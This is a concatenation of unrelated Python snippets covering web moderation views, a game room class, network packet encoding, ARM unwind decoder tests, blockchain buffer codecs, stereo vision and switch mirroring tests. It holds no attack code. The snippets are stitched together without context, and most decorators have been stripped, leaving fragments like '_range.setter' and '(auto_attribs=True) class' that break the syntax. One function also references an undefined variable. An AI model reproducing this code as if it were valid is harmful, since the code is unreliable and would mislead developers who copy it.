class DeleteReport(MethodView): decorators = [allows.requires(IsAtleastModerator, on_fail=FlashAndRedirect(message=_('You are not allowed to view reports.'), level='danger', endpoint='management.overview'))] def post(self, report_id=None): json = request.get_json(silent=True) if (json is not None): ids = json.get('ids') if (not ids): return jsonify(message='No ids provided.', category='error', status=404) data = [] for report in Report.query.filter(Report.id.in_(ids)).all(): if report.delete(): data.append({'id': report.id, 'type': 'delete', 'reverse': False, 'reverse_name': None, 'reverse_url': None}) return jsonify(message='{} reports deleted.'.format(len(data)), category='success', data=data, status=200) report = Report.query.filter_by(id=report_id).first_or_404() report.delete() flash(_('Report deleted.'), 'success') return redirect_or_next(url_for('management.reports'))
class Display(lg.Node): KEYS_TOPIC = lg.Topic(KeysMessage) DISPLAY_TOPIC = lg.Topic(DisplayMessage) def setup(self) -> None: self._stims = None self._shutdown = False def cleanup(self) -> None: self._shutdown = True def _setup_stims(self, window: visual.Window) -> Dict[(str, visual.BaseVisualStim)]: files = importlib_resources.files('psychopy_example') null = ((files / 'images') / 'null.png') with importlib_resources.as_file(null) as null_path: image_stim = visual.ImageStim(window, image=str(null_path), pos=(0, 0)) text_stim = visual.TextStim(window, text='Example Text', pos=(0, 0)) self._stims = {'image': image_stim, 'text': text_stim} (KEYS_TOPIC) async def send_keys(self) -> lg.AsyncPublisher: while (self._stims is None): (await asyncio.sleep(0.1)) (yield (self.KEYS_TOPIC, KeysMessage(list(self._stims.keys())))) (DISPLAY_TOPIC) def update_stim(self, message: DisplayMessage) -> None: for stim in self._stims.values(): stim.autoDraw = False self._stims[message.key].autoDraw = True def display(self): monitor = monitors.Monitor('PsychopyMonitor') window = visual.Window(fullscr=True) self._setup_stims(window) while (not self._shutdown): window.flip() window.close()
def guidedUpdate(tdb, cmdenv): dbFilename = tdb.dbFilename stationID = cmdenv.startStation.ID tmpPath = getTemporaryPath(cmdenv) cur = tdb.query("\n SELECT JULIANDAY('now') - JULIANDAY(MIN(modified)),\n JULIANDAY('now') - JULIANDAY(MAX(modified))\n FROM StationItem\n WHERE station_id = ?\n ", [stationID]) (oldest, newest) = cur.fetchone() if (oldest and newest): cmdenv.NOTE('Current data {:.2f}-{:.2f} days old.', oldest, newest) from .update_gui import render try: render(tdb, cmdenv, tmpPath) cmdenv.DEBUG0('Got results, importing') cache.importDataFromFile(tdb, cmdenv, tmpPath) saveCopyOfChanges(cmdenv, dbFilename, stationID) tmpPath.unlink() tmpPath = None except Exception as e: print('ERROR:', e) print() print('*** YOUR UPDATES WILL BE SAVED AS {} ***'.format('prices.last')) if tmpPath: saveTemporaryFile(tmpPath) if ('EXCEPTIONS' in os.environ): raise e
class ExtendedRoom(DefaultRoom): fallback_desc = 'You see nothing special.' room_state_tag_category = 'room_state' months_per_year = 12 hours_per_day = 24 seasons_per_year = {'spring': ((3 / months_per_year), (6 / months_per_year)), 'summer': ((6 / months_per_year), (9 / months_per_year)), 'autumn': ((9 / months_per_year), (12 / months_per_year)), 'winter': ((12 / months_per_year), (3 / months_per_year))} desc_spring = AttributeProperty('', autocreate=False) desc_summer = AttributeProperty('', autocreate=False) desc_autumn = AttributeProperty('', autocreate=False) desc_winter = AttributeProperty('', autocreate=False) times_of_day = {'night': (0, (6 / hours_per_day)), 'morning': ((6 / hours_per_day), (12 / hours_per_day)), 'afternoon': ((12 / hours_per_day), (18 / hours_per_day)), 'evening': ((18 / hours_per_day), 0)} desc = AttributeProperty('', autocreate=False) details = AttributeProperty(dict, autocreate=False) room_message_rate = 0 room_messages = AttributeProperty(list, autocreate=False) def _get_funcparser(self, looker): return FuncParser({'state': func_state}, looker=looker, room=self) def _start_broadcast_repeat_task(self): if (self.room_message_rate and self.room_messages and (not self.ndb.broadcast_repeat_task)): self.ndb.broadcast_repeat_task = repeat(self.room_message_rate, self.repeat_broadcast_msg_to_room, persistent=False) def at_init(self): self._start_broadcast_repeat_task() def start_repeat_broadcast_messages(self): self._start_broadcast_repeat_task() def repeat_broadcast_message_to_room(self): self.msg_contents(random.choice(self.room_messages)) def get_time_of_day(self): timestamp = gametime.gametime(absolute=True) datestamp = datetime.datetime.fromtimestamp(timestamp) timeslot = (float(datestamp.hour) / self.hours_per_day) for (time_of_day, (start, end)) in self.times_of_day.items(): if ((start < end) and (start <= timeslot < end)): return time_of_day return time_of_day def get_season(self): timestamp = gametime.gametime(absolute=True) datestamp = datetime.datetime.fromtimestamp(timestamp) timeslot = (float(datestamp.month) / self.months_per_year) for (season_of_year, (start, end)) in self.seasons_per_year.items(): if ((start < end) and (start <= timeslot < end)): return season_of_year return season_of_year def room_states(self): return list(sorted(self.tags.get(category=self.room_state_tag_category, return_list=True))) def add_room_state(self, *room_states): self.tags.batch_add(*((state, self.room_state_tag_category) for state in room_states)) def remove_room_state(self, *room_states): for room_state in room_states: self.tags.remove(room_state, category=self.room_state_tag_category) def clear_room_state(self): self.tags.clear(category='room_state') def add_desc(self, desc, room_state=None): if (room_state is None): self.attributes.add('desc', desc) else: self.attributes.add(f'desc_{room_state}', desc) def remove_desc(self, room_state): self.attributes.remove(f'desc_{room_state}') def all_desc(self): return {**{None: (self.db.desc or '')}, **{attr.key[5:]: attr.value for attr in self.db_attributes.filter(db_key__startswith='desc_').order_by('db_key')}} def get_stateful_desc(self): room_states = self.room_states seasons = self.seasons_per_year.keys() seasonal_room_states = [] descriptions = dict(self.db_attributes.filter((Q(db_key__startswith='desc_') | Q(db_key__endswith='_desc'))).values_list('db_key', 'db_value')) for roomstate in sorted(room_states): if (roomstate not in seasons): if (desc := (descriptions.get(f'desc_{roomstate}') or descriptions.get('{roomstate}_desc'))): return desc else: seasonal_room_states.append(roomstate) if (not seasons): return self.attributes.get('desc') for seasonal_roomstate in seasonal_room_states: if (desc := descriptions.get(f'desc_{seasonal_roomstate}')): return desc season = self.get_season() if (desc := (descriptions.get(f'desc_{season}') or descriptions.get(f'{season}_desc'))): return desc return self.attributes.get('desc', self.fallback_desc) def replace_legacy_time_of_day_markup(self, desc): desc = (desc or '') time_of_day = self.get_time_of_day() if (not hasattr(self, 'legacy_timeofday_regex_map')): timeslots = deque() for time_of_day in self.times_of_day: timeslots.append((time_of_day, re.compile(f'<{time_of_day}>(.*?)</{time_of_day}>', re.IGNORECASE))) self.legacy_timeofday_regex_map = {} for i in range(len(timeslots)): self.legacy_timeofday_regex_map[timeslots[0][0]] = [tup[1] for tup in timeslots] timeslots.rotate((- 1)) regextuple = self.legacy_timeofday_regex_map[time_of_day] desc = regextuple[0].sub('\\1', desc) desc = regextuple[1].sub('', desc) desc = regextuple[2].sub('', desc) return regextuple[3].sub('', desc) def get_display_desc(self, looker, **kwargs): desc = self.get_stateful_desc() desc = self.replace_legacy_time_of_day_markup(desc) desc = self._get_funcparser(looker).parse(desc, **kwargs) return desc def add_detail(self, key, description): if (not self.details): self.details = {} self.details[key.lower()] = description set_detail = add_detail def remove_detail(self, key, *args): self.details.pop(key.lower(), None) del_detail = remove_detail def get_detail(self, key, looker=None): key = key.lower() detail_keys = tuple(self.details.keys()) detail = None if (key in detail_keys): detail = self.details[key] else: lkey = len(key) startswith_matches = sorted(((detail_key, abs((lkey - len(detail_key)))) for detail_key in detail_keys if detail_key.startswith(key)), key=(lambda tup: tup[1])) if startswith_matches: detail = self.details[startswith_matches[0][0]] if detail: detail = self._get_funcparser(looker).parse(detail) return detail return_detail = get_detail
(auto_attribs=True) class InvoiceItem(): name: str amount: int quantity: int machine_type: str run_type: str additional_properties: Dict[(str, Any)] = attr.ib(init=False, factory=dict) def to_dict(self) -> Dict[(str, Any)]: name = self.name amount = self.amount quantity = self.quantity machine_type = self.machine_type run_type = self.run_type field_dict: Dict[(str, Any)] = {} field_dict.update(self.additional_properties) field_dict.update({'name': name, 'amount': amount, 'quantity': quantity, 'machine_type': machine_type, 'run_type': run_type}) return field_dict def from_dict(cls: Type[T], src_dict: Dict[(str, Any)]) -> T: d = src_dict.copy() name = d.pop('name') amount = d.pop('amount') quantity = d.pop('quantity') machine_type = d.pop('machine_type') run_type = d.pop('run_type') invoice_item = cls(name=name, amount=amount, quantity=quantity, machine_type=machine_type, run_type=run_type) invoice_item.additional_properties = d return invoice_item def additional_keys(self) -> List[str]: return list(self.additional_properties.keys()) def __getitem__(self, key: str) -> Any: return self.additional_properties[key] def __setitem__(self, key: str, value: Any) -> None: self.additional_properties[key] = value def __delitem__(self, key: str) -> None: del self.additional_properties[key] def __contains__(self, key: str) -> bool: return (key in self.additional_properties)
def to_dict(package, with_latest_build=False, with_latest_succeeded_build=False): source_dict = package.source_json_dict if ('srpm_build_method' in source_dict): source_dict['source_build_method'] = source_dict.pop('srpm_build_method') latest = None if with_latest_build: latest = getattr(package, 'latest_build', None) if (not latest): latest = package.last_build() latest = (build_to_dict(latest) if latest else None) latest_succeeded = None if with_latest_succeeded_build: latest_succeeded = package.last_build(successful=True) latest_succeeded = (build_to_dict(latest_succeeded) if latest_succeeded else None) return {'id': package.id, 'name': package.name, 'projectname': package.copr.name, 'ownername': package.copr.owner_name, 'source_type': package.source_type_text, 'source_dict': source_dict, 'auto_rebuild': package.webhook_rebuild, 'builds': {'latest': latest, 'latest_succeeded': latest_succeeded}}
class parent_port(bsn_tlv): type = 109 def __init__(self, value=None): if (value != None): self.value = value else: self.value = 0 return def pack(self): packed = [] packed.append(struct.pack('!H', self.type)) packed.append(struct.pack('!H', 0)) packed.append(util.pack_port_no(self.value)) length = sum([len(x) for x in packed]) packed[1] = struct.pack('!H', length) return ''.join(packed) def unpack(reader): obj = parent_port() _type = reader.read('!H')[0] assert (_type == 109) _length = reader.read('!H')[0] orig_reader = reader reader = orig_reader.slice(_length, 4) obj.value = util.unpack_port_no(reader) return obj def __eq__(self, other): if (type(self) != type(other)): return False if (self.value != other.value): return False return True def pretty_print(self, q): q.text('parent_port {') with q.group(): with q.indent(2): q.breakable() q.text('value = ') q.text(util.pretty_port(self.value)) q.breakable() q.text('}')
class ADSEntity(): def __init__(self, i2cAddress, busnum=1, atype=0): self.busy = False self.initialized = False self.i2cAddress = int(i2cAddress) self.busnum = int(busnum) self.values = [0, 0, 0, 0] try: if ((atype == 10) or (atype == 0)): self.adc = ADS.ADS1015(address=self.i2cAddress, busnum=self.busnum) self.initialized = True else: self.adc = ADS.ADS1115(address=self.i2cAddress, busnum=self.busnum) self.initialized = True except: self.initialized = False def ADread(self, channel, again=None): val = self.values[channel] try: if self.busy: time.sleep(0.1) if (self.busy == False): self.busy = True val = self.adc.read_adc(channel, gain=again) self.busy = False self.values[channel] = val except: self.busy = False val = 0 return val
class TestEHABIDecoder(unittest.TestCase): def testLLVM(self): mnemonic_array = EHABIBytecodeDecoder([177, 15, 167, 63, 176, 176]).mnemonic_array self.assertEqual(mnemonic_array[0].mnemonic, 'pop {r0, r1, r2, r3}') self.assertEqual(mnemonic_array[1].mnemonic, 'pop {r4, r5, r6, r7, r8, r9, r10, fp}') self.assertEqual(mnemonic_array[2].mnemonic, 'vsp = vsp + 256') self.assertEqual(mnemonic_array[3].mnemonic, 'finish') self.assertEqual(mnemonic_array[4].mnemonic, 'finish') mnemonic_array = EHABIBytecodeDecoder([201, 132, 176]).mnemonic_array self.assertEqual(mnemonic_array[0].mnemonic, 'pop {d8, d9, d10, d11, d12}') self.assertEqual(mnemonic_array[1].mnemonic, 'finish') mnemonic_array = EHABIBytecodeDecoder([215, 201, 2, 200, 2, 199, 3, 198, 2, 194, 186, 179, 18, 178, 128, 4, 177, 1, 176, 169, 161, 145, 132, 192, 128, 192, 128, 1, 129, 0, 128, 0, 66, 2]).mnemonic_array self.assertEqual(mnemonic_array[0].mnemonic, 'pop {d8, d9, d10, d11, d12, d13, d14, d15}') self.assertEqual(mnemonic_array[1].mnemonic, 'pop {d0, d1, d2}') self.assertEqual(mnemonic_array[2].mnemonic, 'pop {d16, d17, d18}') self.assertEqual(mnemonic_array[3].mnemonic, 'pop {wCGR0, wCGR1}') self.assertEqual(mnemonic_array[4].mnemonic, 'pop {wR0, wR1, wR2}') self.assertEqual(mnemonic_array[5].mnemonic, 'pop {wR10, wR11, wR12}') self.assertEqual(mnemonic_array[6].mnemonic, 'pop {d8, d9, d10}') self.assertEqual(mnemonic_array[7].mnemonic, 'pop {d1, d2, d3}') self.assertEqual(mnemonic_array[8].mnemonic, 'vsp = vsp + 2564') self.assertEqual(mnemonic_array[9].mnemonic, 'pop {r0}') self.assertEqual(mnemonic_array[10].mnemonic, 'finish') self.assertEqual(mnemonic_array[11].mnemonic, 'pop {r4, r5, lr}') self.assertEqual(mnemonic_array[12].mnemonic, 'pop {r4, r5}') self.assertEqual(mnemonic_array[13].mnemonic, 'vsp = r1') self.assertEqual(mnemonic_array[14].mnemonic, 'pop {r10, fp, lr}') self.assertEqual(mnemonic_array[15].mnemonic, 'pop {r10, fp}') self.assertEqual(mnemonic_array[16].mnemonic, 'pop {r4}') self.assertEqual(mnemonic_array[17].mnemonic, 'pop {ip}') self.assertEqual(mnemonic_array[18].mnemonic, 'refuse to unwind') self.assertEqual(mnemonic_array[19].mnemonic, 'vsp = vsp - 12') self.assertEqual(mnemonic_array[20].mnemonic, 'vsp = vsp + 12') mnemonic_array = EHABIBytecodeDecoder([216, 208, 202, 201, 0, 200, 0, 199, 16, 199, 1, 199, 0, 198, 0, 192, 184, 180, 179, 0, 178, 0, 177, 16, 177, 1, 177, 0, 176, 168, 160, 159, 157, 145, 136, 0, 128, 0, 64, 0]).mnemonic_array self.assertEqual(mnemonic_array[0].mnemonic, 'spare') self.assertEqual(mnemonic_array[1].mnemonic, 'pop {d8}') self.assertEqual(mnemonic_array[2].mnemonic, 'spare') self.assertEqual(mnemonic_array[3].mnemonic, 'pop {d0}') self.assertEqual(mnemonic_array[4].mnemonic, 'pop {d16}') self.assertEqual(mnemonic_array[5].mnemonic, 'spare') self.assertEqual(mnemonic_array[6].mnemonic, 'pop {wCGR0}') self.assertEqual(mnemonic_array[7].mnemonic, 'spare') self.assertEqual(mnemonic_array[8].mnemonic, 'pop {wR0}') self.assertEqual(mnemonic_array[9].mnemonic, 'pop {wR10}') self.assertEqual(mnemonic_array[10].mnemonic, 'pop {d8}') self.assertEqual(mnemonic_array[11].mnemonic, 'spare') self.assertEqual(mnemonic_array[12].mnemonic, 'pop {d0}') self.assertEqual(mnemonic_array[13].mnemonic, 'vsp = vsp + 516') self.assertEqual(mnemonic_array[14].mnemonic, 'spare') self.assertEqual(mnemonic_array[15].mnemonic, 'pop {r0}') self.assertEqual(mnemonic_array[16].mnemonic, 'spare') self.assertEqual(mnemonic_array[17].mnemonic, 'finish') self.assertEqual(mnemonic_array[18].mnemonic, 'pop {r4, lr}') self.assertEqual(mnemonic_array[19].mnemonic, 'pop {r4}') self.assertEqual(mnemonic_array[20].mnemonic, 'reserved (WiMMX MOVrr)') self.assertEqual(mnemonic_array[21].mnemonic, 'reserved (ARM MOVrr)') self.assertEqual(mnemonic_array[22].mnemonic, 'vsp = r1') self.assertEqual(mnemonic_array[23].mnemonic, 'pop {pc}') self.assertEqual(mnemonic_array[24].mnemonic, 'refuse to unwind') self.assertEqual(mnemonic_array[25].mnemonic, 'vsp = vsp - 4') self.assertEqual(mnemonic_array[26].mnemonic, 'vsp = vsp + 4')
_meta(characters.keine.TeachAction) class TeachAction(): def choose_card_text(self, act, cards): if act.cond(cards): return (True, '') else: return (False, '') def target(self, pl): if (not pl): return (False, '1') return (True, '!')
def test_builder_deployment_type_complex(escrow_package): (escrow, w3) = escrow_package escrow_dep_type = deployment_type(contract_instance='Escrow', contract_type='Escrow', deployment_bytecode={'bytecode': '0xfd5bfddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa3506103dfffffffff7cea7bcddd146100bb872dd146100dbaa9059cbbdd62ed3e1461014a575b600080fd5bfd5b506100a0600160a060020abf35bcfd5b506100c96101d8565bf35befd5b506100a0600160a060020ade565bfd5b506100c9600160a060020ac9565bfd5b506100a0600160a060020ae4565bfd5b506100c9600160a060020ab565ba060020af8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3babbb600160a060020aa060020abb156102bea060020afddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efac2565b5060005bb600160a060020abba060020afddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efad2565bd2565b600160a060020aa165627a7acf9d6a3f751ca1e6b9bc2324e42633a4cde513d64c3e6cc32de'}, runtime_bytecode={'bytecode': '0xffffffff7cea7bcddd146100bb872dd146100dbaa9059cbbdd62ed3e1461014a575b600080fd5bfd5b506100a0600160a060020abf35bcfd5b506100c96101d8565bf35befd5b506100a0600160a060020ade565bfd5b506100c9600160a060020ac9565bfd5b506100a0600160a060020ae4565bfd5b506100c9600160a060020ab565ba060020af8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3babbb600160a060020aa060020abb156102bea060020afddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efac2565b5060005bb600160a060020abba060020afddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efad2565bd2565b600160a060020aa165627a7acf9d6a3f751ca1e6b9bc2324e42633a4cde513d64c3e6cc32de9020029'}, compiler={'name': 'solc', 'version': '0.4.24+commit.e67f0147.Emscripten.clang', 'settings': {'optimize': True}}) safesendlib_dep_type = deployment_type(contract_instance='SafeSendLib', contract_type='SafeSendLib') manifest = build({}, package_name('escrow'), version('1.0.0'), manifest_version('ethpm/3'), escrow_dep_type(block_uri='blockchain:///block/abcdefabcdefabcdefabcdef', address=escrow.deployments.get_instance('Escrow').address), safesendlib_dep_type(block_uri='blockchain:///block/abcdefabcdefabcdefabcdef', address=escrow.deployments.get_instance('SafeSendLib').address), deployment(block_uri='blockchain:///block/abcdefabcdefabcdefabcdef', contract_instance='Escrow', contract_type='Escrow', address=escrow.deployments.get_instance('Escrow').address), deployment(block_uri='blockchain:///block/abcdefabcdefabcdefabcdef', contract_instance='SafeSendLib', contract_type='SafeSendLib', address=escrow.deployments.get_instance('SafeSendLib').address), validate()) assert (len(manifest['deployments'].keys()) == 2) assert (len(list(manifest['deployments'].values())[0]) == 2) assert (len(list(manifest['deployments'].values())[1]) == 2)
class StereoBM(BlockMatcher): parameter_maxima = {'search_range': None, 'window_size': 255, 'stereo_bm_preset': cv2.STEREO_BM_NARROW_PRESET} def search_range(self): return self._search_range _range.setter def search_range(self, value): if ((value == 0) or (not (value % 16))): self._search_range = value else: raise InvalidSearchRangeError('Search range must be a multiple of 16.') self._replace_bm() def window_size(self): return self._window_size _size.setter def window_size(self, value): if ((value > 4) and (value < self.parameter_maxima['window_size']) and (value % 2)): self._window_size = value else: raise InvalidWindowSizeError('Window size must be an odd number between 0 and {}.'.format((self.parameter_maxima['window_size'] + 1))) self._replace_bm() def stereo_bm_preset(self): return self._bm_preset _bm_preset.setter def stereo_bm_preset(self, value): if (value in (cv2.STEREO_BM_BASIC_PRESET, cv2.STEREO_BM_FISH_EYE_PRESET, cv2.STEREO_BM_NARROW_PRESET)): self._bm_preset = value else: raise InvalidBMPresetError('Stereo BM preset must be defined as cv2.STEREO_BM_*_PRESET.') self._replace_bm() def _replace_bm(self): self._block_matcher = cv2.StereoBM(preset=self._bm_preset, ndisparities=self._search_range, SADWindowSize=self._window_size) def __init__(self, stereo_bm_preset=cv2.STEREO_BM_BASIC_PRESET, search_range=80, window_size=21, settings=None): self._bm_preset = cv2.STEREO_BM_BASIC_PRESET self._search_range = 0 self._window_size = 5 self.stereo_bm_preset = stereo_bm_preset self.search_range = search_range self.window_size = window_size super(StereoBM, self).__init__(settings) def get_disparity(self, pair): gray = [] if (pair[0].ndim == 3): for side in pair: gray.append(cv2.cvtColor(side, cv2.COLOR_BGR2GRAY)) else: gray = pair return self._block_matcher.compute(gray[0], gray[1], disptype=cv2.CV_32F)
class ReadOnlyDbInterface(): def __init__(self, connection: (DbConnection | None)=None): self.connection = (connection or ReadOnlyConnection()) self.ro_session = None def get_read_only_session(self) -> Session: if (self.ro_session is not None): (yield self.ro_session) return self.ro_session: Session = self.connection.session_maker() try: (yield self.ro_session) except SQLAlchemyError as err: message = 'Database error when trying to read from the database' logging.exception(f'{message}: {err}') raise DbInterfaceError(message) from err finally: self.ro_session.invalidate() self.ro_session = None
class IOServer(Thread): def __init__(self, rx_port=5556, tx_port=5555, log_file=None): Thread.__init__(self) self.rx_port = rx_port self.tx_port = tx_port self.__stop = Event() self.context = zmq.Context() self.rx_socket = self.context.socket(zmq.SUB) self.rx_socket.connect(('tcp://localhost:%s' % self.rx_port)) self.tx_socket = self.context.socket(zmq.PUB) self.tx_socket.bind(('tcp://*:%s' % self.tx_port)) self.poller = zmq.Poller() self.poller.register(self.rx_socket, zmq.POLLIN) self.handlers = {} self.packet_log = None if (log_file is not None): self.packet_log = open(log_file, 'wt') self.packet_log.write('Direction, Time, Topic, Data\n') def register_topic(self, topic, method): log.debug(('Registering RX_Port: %s, Topic: %s' % (self.rx_port, topic))) self.rx_socket.setsockopt(zmq.SUBSCRIBE, topic.encode('utf-8')) self.handlers[topic] = method def run(self): while (not self.__stop.is_set()): socks = dict(self.poller.poll(1000)) if ((self.rx_socket in socks) and (socks[self.rx_socket] == zmq.POLLIN)): msg = self.rx_socket.recv_string() log.debug(('Received: %s' % str(msg))) (topic, data) = decode_zmq_msg(msg) if self.packet_log: self.packet_log.write(('Sent, %i, %s, %s\n' % (time.time(), topic, binascii.hexlify(data['frame'])))) self.packet_log.flush() method = self.handlers[topic] method(self, data) log.debug('IO Server Stopped') def shutdown(self): log.debug('Stopping Host IO Server') self.__stop.set() if self.packet_log: self.packet_log.close() def send_msg(self, topic, data): msg = encode_zmq_msg(topic, data) self.tx_socket.send_string(msg) if self.packet_log: if ('frame' in data): self.packet_log.write(('Received, %i, %s, %s\n' % (time.time(), topic, binascii.hexlify(data['frame'])))) self.packet_log.flush()
def sympy_to_grim(expr, **kwargs): import sympy assert isinstance(expr, sympy.Expr) if expr.is_Integer: return Expr(int(expr)) if expr.is_Symbol: return Expr(symbol_name=expr.name) if (expr is sympy.pi): return Pi if (expr is sympy.E): return ConstE if (expr is sympy.I): return ConstI if expr.is_Add: args = [sympy_to_grim(x, **kwargs) for x in expr.args] return Add(*args) if expr.is_Mul: args = [sympy_to_grim(x, **kwargs) for x in expr.args] return Mul(*args) if expr.is_Pow: args = [sympy_to_grim(x, **kwargs) for x in expr.args] (b, e) = args return Pow(b, e) raise NotImplementedError('converting %s to Grim', type(expr))
(frozen=True) class TableModelDescr(): name: str def path(self): if ani.settings['graphics']['physical_based_rendering']: path = (((ani.model_dir / 'table') / self.name) / (self.name + '_pbr.glb')) else: path = (((ani.model_dir / 'table') / self.name) / (self.name + '.glb')) if (not path.exists()): raise ConfigError(f"Couldn't find table model with name: {self.name}") return panda_path(path) def null() -> TableModelDescr: return TableModelDescr(name='null')
def create_privacy_request(user_email: str, policy_key: str): privacy_request_data = [{'requested_at': str(datetime.utcnow()), 'policy_key': policy_key, 'identity': {'email': user_email}}] url = f'{FIDESOPS_V1_API_URL}{ops_urls.PRIVACY_REQUESTS}' response = requests.post(url, json=privacy_request_data) if response.ok: created_privacy_requests = response.json()['succeeded'] if (len(created_privacy_requests) > 0): logger.info(f'Created fidesops privacy request for email={email} via {url}') return response.json() raise RuntimeError(f'fidesops privacy request creation failed! response.status_code={response.status_code}, response.json()={response.json()}')
def test_download_and_copy_copy_failure(mock_dependencies): mock_dependencies.copy_expert.side_effect = Exception('DB Error') with pytest.raises(Exception, match='DB Error'): next(_download_and_copy(logger, mock_dependencies, Mock(), DUMMY_BUCKET, DUMMY_KEY, DUMMY_TABLE, DUMMY_COLS, gzipped=True))
def is_equal(left, right): if ((left is not None) and (right is not None)): if (left != right): return False else: return True elif ((left is None) and (right is not None)): return False elif ((left is not None) and (right is None)): return False else: return True
def test_compile_solc_object(project, solc5source): temp = project.compile_source(solc5source) assert (type(temp) is TempProject) assert isinstance(temp, _ProjectBase) assert (len(temp) == 2) assert (temp._name == 'TempSolcProject') assert ('Foo' in temp) assert ('Bar' in temp)
class EOSBuffer(): def __init__(self, v): self._value = v self._count = 0 def _decode_number(self, val, format='L'): byte_val = binascii.unhexlify(val) return convert_big_endian(byte_val, format) def _decode_float(self, val, format='f'): byte_val = binascii.unhexlify(val) return struct.unpack('>{}'.format(format), byte_val) def _decode_name(self, val, format='Q'): num = self._decode_number(val, format) return name_to_string(num) def _decode_str(self, val): vu = VarUInt() (length, val) = vu.decode(val) string = '' leftover = val if (length > 0): (str_data, leftover) = self._splice_buf(val, (length * 2)) string = binascii.unhexlify(str_data).decode() return (string, leftover) def _splice_buf(self, buf, length): return (buf[:length], buf[length:]) def _write_number(self, val, format='q'): le = convert_little_endian(val, format) return binascii.hexlify(le).decode() def _write_name(self, w_str): val = string_to_name(w_str) le = convert_little_endian(val, 'Q') return binascii.hexlify(le).decode() def _write_str(self, w_str): b = bytearray() length = VarUInt(len(w_str)).encode() b.extend(map(ord, w_str)) return binascii.hexlify((length + b)).decode() def _write_varuint(self, vuint): buf = vuint.encode() return binascii.hexlify(buf).decode() def decode(self, objType, buf=None): leftover = '' if (not buf): buf = self._value if isinstance(objType, UInt32): (val, leftover) = self._splice_buf(buf, objType.hex_str_len) val = self._decode_number(val, 'I') elif isinstance(objType, UInt16): (val, leftover) = self._splice_buf(buf, objType.hex_str_len) val = self._decode_number(val, 'H') elif isinstance(objType, VarUInt): (val, leftover) = objType.decode(buf) elif (isinstance(objType, Byte) or isinstance(objType, bool)): (hex_str, leftover) = self._splice_buf(buf, 2) val = hex_to_int(hex_str) elif isinstance(objType, Float): (val, leftover) = self._splice_buf(buf, objType.hex_str_len) val = self._decode_float(val, 'f') elif (isinstance(objType, int) or isinstance(objType, long)): (val, leftover) = self._splice_buf(buf, objType.hex_str_len) val = self._decode_number(val, 'q') elif (isinstance(objType, Name) or isinstance(objType, AccountName) or isinstance(objType, PermissionName) or isinstance(objType, ActionName) or isinstance(objType, TableName) or isinstance(objType, ScopeName)): (val, leftover) = self._splice_buf(buf, objType.hex_str_len) val = self._decode_name(val) elif isinstance(objType, str): (val, leftover) = self._decode_str(buf) elif isinstance(objType, list): val = [] (length, leftover) = VarUInt('').decode(buf) while (len(val) < length): (out, leftover) = self.decode(objType[0], leftover) val.append(out) else: raise EOSBufferInvalidType('Cannot decode type: {}'.format(type(objType))) return (val, leftover) def encode(self, val=None): if (not val): val = self._value if (isinstance(val, Name) or isinstance(val, AccountName) or isinstance(val, PermissionName) or isinstance(val, ActionName) or isinstance(val, TableName) or isinstance(val, ScopeName)): val = self._write_name(val) return val elif isinstance(val, str): return self._write_str(val) elif (isinstance(val, Byte) or isinstance(val, bool)): return int_to_hex(val) elif isinstance(val, UInt16): return self._write_number(val, 'H') elif isinstance(val, UInt32): return self._write_number(val, 'I') elif isinstance(val, UInt64): return self._write_number(val, 'q') elif isinstance(val, Float): return self._write_number(val, 'f') elif isinstance(val, VarUInt): return self._write_varuint(val) elif (isinstance(val, int) or isinstance(val, long)): return self._write_number(val, 'l') elif (isinstance(val, Action) or isinstance(val, AbiStruct) or isinstance(val, AbiStructField) or isinstance(val, AbiType) or isinstance(val, AbiAction) or isinstance(val, AbiTable) or isinstance(val, AbiRicardianClauses) or isinstance(val, AbiErrorMessages) or isinstance(val, AbiExtensions) or isinstance(val, AbiVariants) or isinstance(val, Asset) or isinstance(val, Authorization)): return val.encode() elif isinstance(val, list): buf = self._write_varuint(VarUInt(len(val))) for item in val: e_item = self.encode(item) buf = '{}{}'.format(buf, e_item) return buf else: raise EOSBufferInvalidType('Cannot encode type: {}'.format(type(val)))
def test_that_fetching_unknown_parameter_fails(): content = dedent('roff-asc\n #ROFF file#\n #Creator: Ert#\n tag dimensions\n int nX 1\n int nY 1\n int nZ 1\n endtag\n tag parameter\n char name "parameter"\n array float data 1\n 0.0\n endtag\n tag eof\n endtag\n ') with pytest.raises(ValueError, match="Could not find roff parameter 'does_not_exist' in"): _ = import_roff(StringIO(content), 'does_not_exist')
def extractWwwCntranslationsCom(item): (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return None tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')] for (tagname, name, tl_type) in tagmap: if (tagname in item['tags']): return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
class FaucetUntaggedMultiMirrorTest(FaucetUntaggedTest): CONFIG_GLOBAL = '\nvlans:\n 100:\n description: "untagged"\n' CONFIG = '\n interfaces:\n %(port_1)d:\n native_vlan: 100\n %(port_2)d:\n native_vlan: 100\n %(port_3)d:\n output_only: True\n %(port_4)d:\n output_only: True\n' def test_untagged(self): (first_host, second_host, mirror_host) = self.hosts_name_ordered()[:3] ping_pairs = ((first_host, second_host), (second_host, first_host)) self.flap_all_switch_ports() self.change_port_config(self.port_map['port_3'], 'mirror', [self.port_map['port_1'], self.port_map['port_2']], restart=True, cold_start=False, hup=True) self.verify_ping_mirrored_multi(ping_pairs, mirror_host, both_mirrored=True)
def mutual_friends(*args): from ..api.bot import Bot from ..api.chats import Chats, User class FuzzyUser(User): def __init__(self, user): super(FuzzyUser, self).__init__(user.raw, user.bot) def __hash__(self): return hash((self.nick_name, self.sex, self.province, self.city, self.raw['AttrStatus'])) mutual = set() for arg in args: if isinstance(arg, Bot): friends = map(FuzzyUser, arg.friends()) elif isinstance(arg, Chats): friends = map(FuzzyUser, arg) else: raise TypeError if mutual: mutual &= set(friends) else: mutual.update(friends) return Chats(mutual)
